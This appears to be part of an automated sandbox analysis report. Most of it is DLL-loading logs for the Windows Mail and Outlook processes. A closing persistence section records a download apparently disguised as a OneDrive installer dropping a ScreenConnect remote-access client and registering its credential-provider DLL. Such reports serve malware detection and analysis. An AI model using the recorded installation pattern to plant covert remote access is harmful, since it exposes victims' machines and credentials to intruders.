                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.networking.hostname.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.energy.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rmclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: wldp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: propsys.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rometadata.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.diagnostics.telemetry.platformtelemetryclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.view.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.hxshared.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.viewmodel.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: clipc.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.resources.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: logoncli.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.xaml.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: coremessaging.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: iertutil.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dcomp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windowmanagementapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: textinputframework.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: inputhost.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: coreuicomponents.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: coreuicomponents.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ntmarta.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: urlmon.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: srvcli.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: netutils.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dxgi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mrmcorer.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: d3d11.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.staterepositoryclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: d3d10warp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dxcore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: d2d1.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dwrite.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: textshaping.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.shell.servicehostbuilder.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: execmodelproxy.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: uiamanager.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.core.textinput.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.immersive.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dataexchange.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: userenv.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: profext.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.hx.mail.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: threadpoolwinrt.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.graphics.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: twinapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.hxcalendar.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.xaml.controls.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.remotedesktop.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winsta.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: directmanipulation.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.profile.systemid.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.profile.retailinfo.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msxml6.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: wininet.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: sspicli.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winhttp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mswsock.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winrttracing.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: iphlpapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winnsi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dnsapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rasadhlp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: fwpuclnt.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: schannel.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windowscodecs.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: photometadatahandler.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ploptin.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dwmapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mskeyprotect.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ntasn1.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ncrypt.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ncryptsslp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msasn1.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dpapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: gpapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: userdataaccountapis.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: userdataplatformhelperutil.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.accountscontrol.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: xmllite.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: accountsrt.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: aphostclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: webservices.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: execmodelclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: apphelp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: hxoutlook.model.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: microsoft.applications.telemetry.windows.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: mso20imm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vccorlib140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vcruntime140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vcruntime140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: mso30imm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.xaml.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: coremessaging.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: bcp47langs.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: iertutil.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dcomp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: wintypes.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.staterepositorycore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windowmanagementapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: textinputframework.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: inputhost.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: coreuicomponents.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: propsys.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: coreuicomponents.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: ntmarta.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: urlmon.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: srvcli.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: netutils.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dxgi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: office.ui.xaml.hxaccounts.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: d3d11.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.storage.applicationdata.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: d3d10warp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dxcore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: d2d1.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: hxcomm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dwrite.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.applicationmodel.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: textshaping.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.globalization.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: bcp47mrm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: profapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.networking.connectivity.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.networking.hostname.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.energy.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: rmclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: wldp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: rometadata.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.system.diagnostics.telemetry.platformtelemetryclient.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Window found: window name: SysTabControl32
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe | File opened: C:\Windows\SYSTEM32\msftedit.dll
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

                      Persistence and Installation Behavior

                      Source: c:\program files (x86)\screenconnect client (d241e538b9eb3f0a)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-13db-35f7eaaa7a38}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (d241e538b9eb3f0a)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-13db-35f7eaaa7a38}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (d241e538b9eb3f0a)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-13db-35f7eaaa7a38}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (d241e538b9eb3f0a)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-13db-35f7eaaa7a38}\inprocserver32
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\Downloads\Unconfirmed 111805.crdownload
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsFileManager.exe
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\Downloads\eda2c7bf-7eeb-4af6-a518-8725894275d2.tmp
